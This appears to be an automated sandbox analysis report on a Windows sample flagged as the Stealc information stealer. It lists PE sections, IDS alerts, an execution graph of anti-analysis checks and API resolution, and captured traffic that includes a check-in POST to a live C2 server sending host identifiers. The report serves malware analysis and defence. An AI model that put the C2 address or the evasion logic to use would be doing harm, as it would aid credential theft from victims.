                    and al, byte ptr [eax]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add dword ptr [eax+00000000h], eax
                    add byte ptr [eax], al
                    adc byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add eax, 0000000Ah
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax+0Ah], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    or byte ptr [eax+00000000h], al
                    add byte ptr [eax], al
                    adc byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add dword ptr [edx], ecx
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    xor byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax+00000000h], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    or byte ptr [eax+00000000h], al
                    add byte ptr [eax], al

                    Rich Headers

                    Programming Language:
                    • [C++] VS2010 build 30319
                    • [ASM] VS2010 build 30319
                    • [ C ] VS2010 build 30319
                    • [ C ] VS2008 SP1 build 30729
                    • [IMP] VS2008 SP1 build 30729
                    • [LNK] VS2010 build 30319

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    0x10000x25b0000x22800cb189a9b4adcb633de4285dce4a15366unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    0x25e0000x2920000x200e07f8870ce9dafa6d467e74d174635dbunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    midxwoqt0x4f00000x1950000x194c004537172a80d58683c2922bef2dea29d6False0.9945646666537986data7.953836715347976IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    dekzctjc0x6850000x10000x60019cd065333f1a7796ea77fc156bf4124False0.5559895833333334data4.874651785581111IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .taggant0x6860000x30000x2200052eee5a5db1ed1a4de4881e39265fbeFalse0.05767463235294118DOS executable (COM)0.7049367580891545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                    Imports

                    DLLImport
                    kernel32.dlllstrcpy

                    Network Behavior

                    Suricata IDS Alerts

                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                    2024-10-13T13:59:37.994165+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.3780TCP

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Oct 13, 2024 13:59:09.753259897 CEST4973080192.168.2.4185.215.113.37
                    Oct 13, 2024 13:59:09.758985996 CEST8049730185.215.113.37192.168.2.4
                    Oct 13, 2024 13:59:09.759083986 CEST4973080192.168.2.4185.215.113.37
                    Oct 13, 2024 13:59:09.759407997 CEST4973080192.168.2.4185.215.113.37
                    Oct 13, 2024 13:59:09.764636040 CEST8049730185.215.113.37192.168.2.4
                    Oct 13, 2024 13:59:37.742793083 CEST8049730185.215.113.37192.168.2.4
                    Oct 13, 2024 13:59:37.742996931 CEST4973080192.168.2.4185.215.113.37
                    Oct 13, 2024 13:59:37.748512030 CEST4973080192.168.2.4185.215.113.37
                    Oct 13, 2024 13:59:37.753431082 CEST8049730185.215.113.37192.168.2.4
                    Oct 13, 2024 13:59:37.993841887 CEST8049730185.215.113.37192.168.2.4
                    Oct 13, 2024 13:59:37.994164944 CEST4973080192.168.2.4185.215.113.37
                    Oct 13, 2024 13:59:41.451417923 CEST4973080192.168.2.4185.215.113.37

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Oct 13, 2024 13:59:51.764630079 CEST5362528162.159.36.2192.168.2.4
                    Oct 13, 2024 13:59:52.460143089 CEST53629891.1.1.1192.168.2.4

                    HTTP Request Dependency Graph

                    • 185.215.113.37

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.449730185.215.113.37807472C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Oct 13, 2024 13:59:09.759407997 CEST89OUTGET / HTTP/1.1
                    Host: 185.215.113.37
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Oct 13, 2024 13:59:37.742793083 CEST203INHTTP/1.1 200 OK
                    Date: Sun, 13 Oct 2024 11:59:37 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 0
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                    Oct 13, 2024 13:59:37.748512030 CEST411OUTPOST /e2b1563c6670f193.php HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----CFHDHIJDGCBAKFIEGHCB
                    Host: 185.215.113.37
                    Content-Length: 210
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Data Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 41 39 34 46 32 38 36 39 36 37 39 34 33 34 30 30 30 36 33 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 2d 2d 0d 0a
                    Data Ascii: ------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="hwid"E6A94F286967943400063------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="build"doma------CFHDHIJDGCBAKFIEGHCB--
                    Oct 13, 2024 13:59:37.993841887 CEST210INHTTP/1.1 200 OK
                    Date: Sun, 13 Oct 2024 11:59:37 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 8
                    Keep-Alive: timeout=5, max=99
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 59 6d 78 76 59 32 73 3d
                    Data Ascii: YmxvY2s=


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    System Behavior

                    General

                    Target ID:0
                    Start time:07:59:04
                    Start date:13/10/2024
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\file.exe"
                    Imagebase:0x3d0000
                    File size:1'814'528 bytes
                    MD5 hash:33F53A09CB02C7459D8723408C86EBBE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2072556856.000000000106E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1751441710.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    Disassembly

                    Reset < >

                      Execution Graph

                      Execution Coverage:8.2%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:9.7%
                      Total number of Nodes:2000
                      Total number of Limit Nodes:24
                      execution_graph 13489 3e69f0 13534 3d2260 13489->13534 13513 3e6a64 13514 3ea9b0 4 API calls 13513->13514 13515 3e6a6b 13514->13515 13516 3ea9b0 4 API calls 13515->13516 13517 3e6a72 13516->13517 13518 3ea9b0 4 API calls 13517->13518 13519 3e6a79 13518->13519 13520 3ea9b0 4 API calls 13519->13520 13521 3e6a80 13520->13521 13686 3ea8a0 13521->13686 13523 3e6b0c 13690 3e6920 GetSystemTime 13523->13690 13525 3e6a89 13525->13523 13527 3e6ac2 OpenEventA 13525->13527 13529 3e6ad9 13527->13529 13530 3e6af5 CloseHandle Sleep 13527->13530 13533 3e6ae1 CreateEventA 13529->13533 13532 3e6b0a 13530->13532 13532->13525 13533->13523 13887 3d45c0 13534->13887 13536 3d2274 13537 3d45c0 2 API calls 13536->13537 13538 3d228d 13537->13538 13539 3d45c0 2 API calls 13538->13539 13540 3d22a6 13539->13540 13541 3d45c0 2 API calls 13540->13541 13542 3d22bf 13541->13542 13543 3d45c0 2 API calls 13542->13543 13544 3d22d8 13543->13544 13545 3d45c0 2 API calls 13544->13545 13546 3d22f1 13545->13546 13547 3d45c0 2 API calls 13546->13547 13548 3d230a 13547->13548 13549 3d45c0 2 API calls 13548->13549 13550 3d2323 13549->13550 13551 3d45c0 2 API calls 13550->13551 13552 3d233c 13551->13552 13553 3d45c0 2 API calls 13552->13553 13554 3d2355 13553->13554 13555 3d45c0 2 API calls 13554->13555 13556 3d236e 13555->13556 13557 3d45c0 2 API calls 13556->13557 13558 3d2387 13557->13558 13559 3d45c0 2 API calls 13558->13559 13560 3d23a0 13559->13560 13561 3d45c0 2 API calls 13560->13561 13562 3d23b9 13561->13562 13563 3d45c0 2 API calls 13562->13563 13564 3d23d2 13563->13564 13565 3d45c0 2 API calls 13564->13565 13566 3d23eb 13565->13566 13567 3d45c0 2 API calls 13566->13567 13568 3d2404 13567->13568 13569 3d45c0 2 API calls 13568->13569 13570 3d241d 13569->13570 13571 3d45c0 2 API calls 13570->13571 13572 3d2436 13571->13572 13573 3d45c0 2 API calls 13572->13573 13574 3d244f 13573->13574 13575 3d45c0 2 API calls 13574->13575 13576 3d2468 13575->13576 13577 3d45c0 2 API calls 13576->13577 13578 3d2481 13577->13578 13579 3d45c0 2 API calls 13578->13579 13580 3d249a 13579->13580 13581 3d45c0 2 API calls 13580->13581 13582 3d24b3 13581->13582 13583 3d45c0 2 API calls 13582->13583 13584 3d24cc 13583->13584 13585 3d45c0 2 API calls 13584->13585 13586 3d24e5 13585->13586 13587 3d45c0 2 API calls 13586->13587 13588 3d24fe 13587->13588 13589 3d45c0 2 API calls 13588->13589 13590 3d2517 13589->13590 13591 3d45c0 2 API calls 13590->13591 13592 3d2530 13591->13592 13593 3d45c0 2 API calls 13592->13593 13594 3d2549 13593->13594 13595 3d45c0 2 API calls 13594->13595 13596 3d2562 13595->13596 13597 3d45c0 2 API calls 13596->13597 13598 3d257b 13597->13598 13599 3d45c0 2 API calls 13598->13599 13600 3d2594 13599->13600 13601 3d45c0 2 API calls 13600->13601 13602 3d25ad 13601->13602 13603 3d45c0 2 API calls 13602->13603 13604 3d25c6 13603->13604 13605 3d45c0 2 API calls 13604->13605 13606 3d25df 13605->13606 13607 3d45c0 2 API calls 13606->13607 13608 3d25f8 13607->13608 13609 3d45c0 2 API calls 13608->13609 13610 3d2611 13609->13610 13611 3d45c0 2 API calls 13610->13611 13612 3d262a 13611->13612 13613 3d45c0 2 API calls 13612->13613 13614 3d2643 13613->13614 13615 3d45c0 2 API calls 13614->13615 13616 3d265c 13615->13616 13617 3d45c0 2 API calls 13616->13617 13618 3d2675 13617->13618 13619 3d45c0 2 API calls 13618->13619 13620 3d268e 13619->13620 13621 3e9860 13620->13621 13892 3e9750 GetPEB 13621->13892 13623 3e9868 13624 3e987a 13623->13624 13625 3e9a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13623->13625 13628 3e988c 21 API calls 13624->13628 13626 3e9b0d 13625->13626 13627 3e9af4 GetProcAddress 13625->13627 13629 3e9b46 13626->13629 13630 3e9b16 GetProcAddress GetProcAddress 13626->13630 13627->13626 13628->13625 13631 3e9b4f GetProcAddress 13629->13631 13632 3e9b68 13629->13632 13630->13629 13631->13632 13633 3e9b89 13632->13633 13634 3e9b71 GetProcAddress 13632->13634 13635 3e9b92 GetProcAddress GetProcAddress 13633->13635 13636 3e6a00 13633->13636 13634->13633 13635->13636 13637 3ea740 13636->13637 13638 3ea750 13637->13638 13639 3e6a0d 13638->13639 13640 3ea77e lstrcpy 13638->13640 13641 3d11d0 13639->13641 13640->13639 13642 3d11e8 13641->13642 13643 3d120f ExitProcess 13642->13643 13644 3d1217 13642->13644 13645 3d1160 GetSystemInfo 13644->13645 13646 3d117c ExitProcess 13645->13646 13647 3d1184 13645->13647 13648 3d1110 GetCurrentProcess VirtualAllocExNuma 13647->13648 13649 3d1149 13648->13649 13650 3d1141 ExitProcess 13648->13650 13893 3d10a0 VirtualAlloc 13649->13893 13653 3d1220 13897 3e89b0 13653->13897 13656 3d1249 __aulldiv 13657 3d129a 13656->13657 13658 3d1292 ExitProcess 13656->13658 13659 3e6770 GetUserDefaultLangID 13657->13659 13660 3e6792 13659->13660 13661 3e67d3 13659->13661 13660->13661 13662 3e67ad ExitProcess 13660->13662 13663 3e67cb ExitProcess 13660->13663 13664 3e67b7 ExitProcess 13660->13664 13665 3e67a3 ExitProcess 13660->13665 13666 3e67c1 ExitProcess 13660->13666 13667 3d1190 13661->13667 13668 3e78e0 3 API calls 13667->13668 13670 3d119e 13668->13670 13669 3d11cc 13674 3e7850 GetProcessHeap RtlAllocateHeap GetUserNameA 13669->13674 13670->13669 13671 3e7850 3 API calls 13670->13671 13672 3d11b7 13671->13672 13672->13669 13673 3d11c4 ExitProcess 13672->13673 13675 3e6a30 13674->13675 13676 3e78e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13675->13676 13677 3e6a43 13676->13677 13678 3ea9b0 13677->13678 13899 3ea710 13678->13899 13680 3ea9c1 lstrlen 13681 3ea9e0 13680->13681 13682 3eaa18 13681->13682 13684 3ea9fa lstrcpy lstrcat 13681->13684 13900 3ea7a0 13682->13900 13684->13682 13685 3eaa24 13685->13513 13687 3ea8bb 13686->13687 13688 3ea90b 13687->13688 13689 3ea8f9 lstrcpy 13687->13689 13688->13525 13689->13688 13904 3e6820 13690->13904 13692 3e698e 13693 3e6998 sscanf 13692->13693 13933 3ea800 13693->13933 13695 3e69aa SystemTimeToFileTime SystemTimeToFileTime 13696 3e69ce 13695->13696 13697 3e69e0 13695->13697 13696->13697 13698 3e69d8 ExitProcess 13696->13698 13699 3e5b10 13697->13699 13700 3e5b1d 13699->13700 13701 3ea740 lstrcpy 13700->13701 13702 3e5b2e 13701->13702 13935 3ea820 lstrlen 13702->13935 13705 3ea820 2 API calls 13706 3e5b64 13705->13706 13707 3ea820 2 API calls 13706->13707 13708 3e5b74 13707->13708 13939 3e6430 13708->13939 13711 3ea820 2 API calls 13712 3e5b93 13711->13712 13713 3ea820 2 API calls 13712->13713 13714 3e5ba0 13713->13714 13715 3ea820 2 API calls 13714->13715 13716 3e5bad 13715->13716 13717 3ea820 2 API calls 13716->13717 13718 3e5bf9 13717->13718 13948 3d26a0 13718->13948 13726 3e5cc3 13727 3e6430 lstrcpy 13726->13727 13728 3e5cd5 13727->13728 13729 3ea7a0 lstrcpy 13728->13729 13730 3e5cf2 13729->13730 13731 3ea9b0 4 API calls 13730->13731 13732 3e5d0a 13731->13732 13733 3ea8a0 lstrcpy 13732->13733 13734 3e5d16 13733->13734 13735 3ea9b0 4 API calls 13734->13735 13736 3e5d3a 13735->13736 13737 3ea8a0 lstrcpy 13736->13737 13738 3e5d46 13737->13738 13739 3ea9b0 4 API calls 13738->13739 13740 3e5d6a 13739->13740 13741 3ea8a0 lstrcpy 13740->13741 13742 3e5d76 13741->13742 13743 3ea740 lstrcpy 13742->13743 13744 3e5d9e 13743->13744 14674 3e7500 GetWindowsDirectoryA 13744->14674 13747 3ea7a0 lstrcpy 13748 3e5db8 13747->13748 14684 3d4880 13748->14684 13750 3e5dbe 14829 3e17a0 13750->14829 13752 3e5dc6 13753 3ea740 lstrcpy 13752->13753 13754 3e5de9 13753->13754 13755 3d1590 lstrcpy 13754->13755 13756 3e5dfd 13755->13756 14845 3d5960 13756->14845 13758 3e5e03 14989 3e1050 13758->14989 13760 3e5e0e 13761 3ea740 lstrcpy 13760->13761 13762 3e5e32 13761->13762 13763 3d1590 lstrcpy 13762->13763 13764 3e5e46 13763->13764 13765 3d5960 34 API calls 13764->13765 13766 3e5e4c 13765->13766 14993 3e0d90 13766->14993 13768 3e5e57 13769 3ea740 lstrcpy 13768->13769 13770 3e5e79 13769->13770 13771 3d1590 lstrcpy 13770->13771 13772 3e5e8d 13771->13772 13773 3d5960 34 API calls 13772->13773 13774 3e5e93 13773->13774 15000 3e0f40 13774->15000 13776 3e5e9e 13777 3d1590 lstrcpy 13776->13777 13778 3e5eb5 13777->13778 15005 3e1a10 13778->15005 13780 3e5eba 13781 3ea740 lstrcpy 13780->13781 13782 3e5ed6 13781->13782 15349 3d4fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13782->15349 13784 3e5edb 13785 3d1590 lstrcpy 13784->13785 13786 3e5f5b 13785->13786 15356 3e0740 13786->15356 13788 3e5f60 13789 3ea740 lstrcpy 13788->13789 13790 3e5f86 13789->13790 13791 3d1590 lstrcpy 13790->13791 13792 3e5f9a 13791->13792 13793 3d5960 34 API calls 13792->13793 13794 3e5fa0 13793->13794 13888 3d45d1 RtlAllocateHeap 13887->13888 13890 3d4621 VirtualProtect 13888->13890 13890->13536 13892->13623 13894 3d10c2 ctype 13893->13894 13895 3d10fd 13894->13895 13896 3d10e2 VirtualFree 13894->13896 13895->13653 13896->13895 13898 3d1233 GlobalMemoryStatusEx 13897->13898 13898->13656 13899->13680 13901 3ea7c2 13900->13901 13902 3ea7ec 13901->13902 13903 3ea7da lstrcpy 13901->13903 13902->13685 13903->13902 13905 3ea740 lstrcpy 13904->13905 13906 3e6833 13905->13906 13907 3ea9b0 4 API calls 13906->13907 13908 3e6845 13907->13908 13909 3ea8a0 lstrcpy 13908->13909 13910 3e684e 13909->13910 13911 3ea9b0 4 API calls 13910->13911 13912 3e6867 13911->13912 13913 3ea8a0 lstrcpy 13912->13913 13914 3e6870 13913->13914 13915 3ea9b0 4 API calls 13914->13915 13916 3e688a 13915->13916 13917 3ea8a0 lstrcpy 13916->13917 13918 3e6893 13917->13918 13919 3ea9b0 4 API calls 13918->13919 13920 3e68ac 13919->13920 13921 3ea8a0 lstrcpy 13920->13921 13922 3e68b5 13921->13922 13923 3ea9b0 4 API calls 13922->13923 13924 3e68cf 13923->13924 13925 3ea8a0 lstrcpy 13924->13925 13926 3e68d8 13925->13926 13927 3ea9b0 4 API calls 13926->13927 13928 3e68f3 13927->13928 13929 3ea8a0 lstrcpy 13928->13929 13930 3e68fc 13929->13930 13931 3ea7a0 lstrcpy 13930->13931 13932 3e6910 13931->13932 13932->13692 13934 3ea812 13933->13934 13934->13695 13936 3ea83f 13935->13936 13937 3e5b54 13936->13937 13938 3ea87b lstrcpy 13936->13938 13937->13705 13938->13937 13940 3ea8a0 lstrcpy 13939->13940 13941 3e6443 13940->13941 13942 3ea8a0 lstrcpy 13941->13942 13943 3e6455 13942->13943 13944 3ea8a0 lstrcpy 13943->13944 13945 3e6467 13944->13945 13946 3ea8a0 lstrcpy 13945->13946 13947 3e5b86 13946->13947 13947->13711 13949 3d45c0 2 API calls 13948->13949 13950 3d26b4 13949->13950 13951 3d45c0 2 API calls 13950->13951 13952 3d26d7 13951->13952 13953 3d45c0 2 API calls 13952->13953 13954 3d26f0 13953->13954 13955 3d45c0 2 API calls 13954->13955 13956 3d2709 13955->13956 13957 3d45c0 2 API calls 13956->13957 13958 3d2736 13957->13958 13959 3d45c0 2 API calls 13958->13959 13960 3d274f 13959->13960 13961 3d45c0 2 API calls 13960->13961 13962 3d2768 13961->13962 13963 3d45c0 2 API calls 13962->13963 13964 3d2795 13963->13964 13965 3d45c0 2 API calls 13964->13965 13966 3d27ae 13965->13966 13967 3d45c0 2 API calls 13966->13967 13968 3d27c7 13967->13968 13969 3d45c0 2 API calls 13968->13969 13970 3d27e0 13969->13970 13971 3d45c0 2 API calls 13970->13971 13972 3d27f9 13971->13972 13973 3d45c0 2 API calls 13972->13973 13974 3d2812 13973->13974 13975 3d45c0 2 API calls 13974->13975 13976 3d282b 13975->13976 13977 3d45c0 2 API calls 13976->13977 13978 3d2844 13977->13978 13979 3d45c0 2 API calls 13978->13979 13980 3d285d 13979->13980 13981 3d45c0 2 API calls 13980->13981 13982 3d2876 13981->13982 13983 3d45c0 2 API calls 13982->13983 13984 3d288f 13983->13984 13985 3d45c0 2 API calls 13984->13985 13986 3d28a8 13985->13986 13987 3d45c0 2 API calls 13986->13987 13988 3d28c1 13987->13988 13989 3d45c0 2 API calls 13988->13989 13990 3d28da 13989->13990 13991 3d45c0 2 API calls 13990->13991 13992 3d28f3 13991->13992 13993 3d45c0 2 API calls 13992->13993 13994 3d290c 13993->13994 13995 3d45c0 2 API calls 13994->13995 13996 3d2925 13995->13996 13997 3d45c0 2 API calls 13996->13997 13998 3d293e 13997->13998 13999 3d45c0 2 API calls 13998->13999 14000 3d2957 13999->14000 14001 3d45c0 2 API calls 14000->14001 14002 3d2970 14001->14002 14003 3d45c0 2 API calls 14002->14003 14004 3d2989 14003->14004 14005 3d45c0 2 API calls 14004->14005 14006 3d29a2 14005->14006 14007 3d45c0 2 API calls 14006->14007 14008 3d29bb 14007->14008 14009 3d45c0 2 API calls 14008->14009 14010 3d29d4 14009->14010 14011 3d45c0 2 API calls 14010->14011 14012 3d29ed 14011->14012 14013 3d45c0 2 API calls 14012->14013 14014 3d2a06 14013->14014 14015 3d45c0 2 API calls 14014->14015 14016 3d2a1f 14015->14016 14017 3d45c0 2 API calls 14016->14017 14018 3d2a38 14017->14018 14019 3d45c0 2 API calls 14018->14019 14020 3d2a51 14019->14020 14021 3d45c0 2 API calls 14020->14021 14022 3d2a6a 14021->14022 14023 3d45c0 2 API calls 14022->14023 14024 3d2a83 14023->14024 14025 3d45c0 2 API calls 14024->14025 14026 3d2a9c 14025->14026 14027 3d45c0 2 API calls 14026->14027 14028 3d2ab5 14027->14028 14029 3d45c0 2 API calls 14028->14029 14030 3d2ace 14029->14030 14031 3d45c0 2 API calls 14030->14031 14032 3d2ae7 14031->14032 14033 3d45c0 2 API calls 14032->14033 14034 3d2b00 14033->14034 14035 3d45c0 2 API calls 14034->14035 14036 3d2b19 14035->14036 14037 3d45c0 2 API calls 14036->14037 14038 3d2b32 14037->14038 14039 3d45c0 2 API calls 14038->14039 14040 3d2b4b 14039->14040 14041 3d45c0 2 API calls 14040->14041 14042 3d2b64 14041->14042 14043 3d45c0 2 API calls 14042->14043 14044 3d2b7d 14043->14044 14045 3d45c0 2 API calls 14044->14045 14046 3d2b96 14045->14046 14047 3d45c0 2 API calls 14046->14047 14048 3d2baf 14047->14048 14049 3d45c0 2 API calls 14048->14049 14050 3d2bc8 14049->14050 14051 3d45c0 2 API calls 14050->14051 14052 3d2be1 14051->14052 14053 3d45c0 2 API calls 14052->14053 14054 3d2bfa 14053->14054 14055 3d45c0 2 API calls 14054->14055 14056 3d2c13 14055->14056 14057 3d45c0 2 API calls 14056->14057 14058 3d2c2c 14057->14058 14059 3d45c0 2 API calls 14058->14059 14060 3d2c45 14059->14060 14061 3d45c0 2 API calls 14060->14061 14062 3d2c5e 14061->14062 14063 3d45c0 2 API calls 14062->14063 14064 3d2c77 14063->14064 14065 3d45c0 2 API calls 14064->14065 14066 3d2c90 14065->14066 14067 3d45c0 2 API calls 14066->14067 14068 3d2ca9 14067->14068 14069 3d45c0 2 API calls 14068->14069 14070 3d2cc2 14069->14070 14071 3d45c0 2 API calls 14070->14071 14072 3d2cdb 14071->14072 14073 3d45c0 2 API calls 14072->14073 14074 3d2cf4 14073->14074 14075 3d45c0 2 API calls 14074->14075 14076 3d2d0d 14075->14076 14077 3d45c0 2 API calls 14076->14077 14078 3d2d26 14077->14078 14079 3d45c0 2 API calls 14078->14079 14080 3d2d3f 14079->14080 14081 3d45c0 2 API calls 14080->14081 14082 3d2d58 14081->14082 14083 3d45c0 2 API calls 14082->14083 14084 3d2d71 14083->14084 14085 3d45c0 2 API calls 14084->14085 14086 3d2d8a 14085->14086 14087 3d45c0 2 API calls 14086->14087 14088 3d2da3 14087->14088 14089 3d45c0 2 API calls 14088->14089 14090 3d2dbc 14089->14090 14091 3d45c0 2 API calls 14090->14091 14092 3d2dd5 14091->14092 14093 3d45c0 2 API calls 14092->14093 14094 3d2dee 14093->14094 14095 3d45c0 2 API calls 14094->14095 14096 3d2e07 14095->14096 14097 3d45c0 2 API calls 14096->14097 14098 3d2e20 14097->14098 14099 3d45c0 2 API calls 14098->14099 14100 3d2e39 14099->14100 14101 3d45c0 2 API calls 14100->14101 14102 3d2e52 14101->14102 14103 3d45c0 2 API calls 14102->14103 14104 3d2e6b 14103->14104 14105 3d45c0 2 API calls 14104->14105 14106 3d2e84 14105->14106 14107 3d45c0 2 API calls 14106->14107 14108 3d2e9d 14107->14108 14109 3d45c0 2 API calls 14108->14109 14110 3d2eb6 14109->14110 14111 3d45c0 2 API calls 14110->14111 14112 3d2ecf 14111->14112 14113 3d45c0 2 API calls 14112->14113 14114 3d2ee8 14113->14114 14115 3d45c0 2 API calls 14114->14115 14116 3d2f01 14115->14116 14117 3d45c0 2 API calls 14116->14117 14118 3d2f1a 14117->14118 14119 3d45c0 2 API calls 14118->14119 14120 3d2f33 14119->14120 14121 3d45c0 2 API calls 14120->14121 14122 3d2f4c 14121->14122 14123 3d45c0 2 API calls 14122->14123 14124 3d2f65 14123->14124 14125 3d45c0 2 API calls 14124->14125 14126 3d2f7e 14125->14126 14127 3d45c0 2 API calls 14126->14127 14128 3d2f97 14127->14128 14129 3d45c0 2 API calls 14128->14129 14130 3d2fb0 14129->14130 14131 3d45c0 2 API calls 14130->14131 14132 3d2fc9 14131->14132 14133 3d45c0 2 API calls 14132->14133 14134 3d2fe2 14133->14134 14135 3d45c0 2 API calls 14134->14135 14136 3d2ffb 14135->14136 14137 3d45c0 2 API calls 14136->14137 14138 3d3014 14137->14138 14139 3d45c0 2 API calls 14138->14139 14140 3d302d 14139->14140 14141 3d45c0 2 API calls 14140->14141 14142 3d3046 14141->14142 14143 3d45c0 2 API calls 14142->14143 14144 3d305f 14143->14144 14145 3d45c0 2 API calls 14144->14145 14146 3d3078 14145->14146 14147 3d45c0 2 API calls 14146->14147 14148 3d3091 14147->14148 14149 3d45c0 2 API calls 14148->14149 14150 3d30aa 14149->14150 14151 3d45c0 2 API calls 14150->14151 14152 3d30c3 14151->14152 14153 3d45c0 2 API calls 14152->14153 14154 3d30dc 14153->14154 14155 3d45c0 2 API calls 14154->14155 14156 3d30f5 14155->14156 14157 3d45c0 2 API calls 14156->14157 14158 3d310e 14157->14158 14159 3d45c0 2 API calls 14158->14159 14160 3d3127 14159->14160 14161 3d45c0 2 API calls 14160->14161 14162 3d3140 14161->14162 14163 3d45c0 2 API calls 14162->14163 14164 3d3159 14163->14164 14165 